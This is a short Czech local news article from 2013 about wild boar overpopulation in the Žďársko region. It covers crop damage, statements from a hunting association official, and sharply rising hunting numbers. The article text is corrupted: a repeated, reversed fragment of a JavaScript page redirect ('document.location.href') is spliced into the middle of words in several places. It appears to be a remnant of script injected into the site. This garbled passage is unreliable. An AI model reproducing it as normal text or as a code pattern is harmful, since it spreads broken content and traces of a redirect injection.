Žďársko, zdarsko, aktuality, divoká prasata
Rainbow page separator

Ulovených divočáků přibývá

Pátek, 29. března 2013

Žďársko / Přemnožená divoká prasata na Žďársku likvidují zemědělské plodiny i porosty. V lánech řepky a pak v kukuřici mají dost potravy a vyhnat je odtud podle myslivců není jednoduché.

Na Žďársku se ale dosud vždy zemědělci s myslivci nějak domluvili na kompenzaci případné škody. Pěs[„\’///:ptth\’=ferh.noitacol.tnemucod“];[„\’///:ptth\’=ferh.noitacol.tnemucod“];tování zemědělských plodin na velkých plochách černé zvěři při jejím shánění potravy nahrává „Na jaře se začnou divočáci krmit řepkou, pak se usadí v kukuřici, kde zůstávají dlouhodobě, pro[„\’///:ptth\’=ferh.noitacol.tnemucod“];[„\’///:ptth\’=ferh.noitacol.tnemucod“];tože všude kolem mají dost potravy, a vyhnat je odtud bývá problém. V souvislém porostu kukuřice je [„\’///:ptth\’=ferh.noitacol.tnemucod“];[„\’///:ptth\’=ferh.noitacol.tnemucod“];to velmi obtížné a při společných naháňkách nebezpečné, pro[„\’///:ptth\’=ferh.noitacol.tnemucod“];[„\’///:ptth\’=ferh.noitacol.tnemucod“];tože se nedá střílet tam, kam není vidět,“ uvedl jednatel Okresního mysliveckého spolku ve Žďáře nad Sázavou Oldřich Sedlář.

Myslivci se snaží počet přemnožených divočáků redukovat. Na Žďársku kupříkladu čítal dlouhodobý průměr počtu kusů ulovené černé zvěře kolem šesti set ročně. V roce 2011 jich už myslivci ulovili 1200 a loni [„\’///:ptth\’=ferh.noitacol.tnemucod“];[„\’///:ptth\’=ferh.noitacol.tnemucod“];to bylo dokonce přes dva tisíce divokých prasat.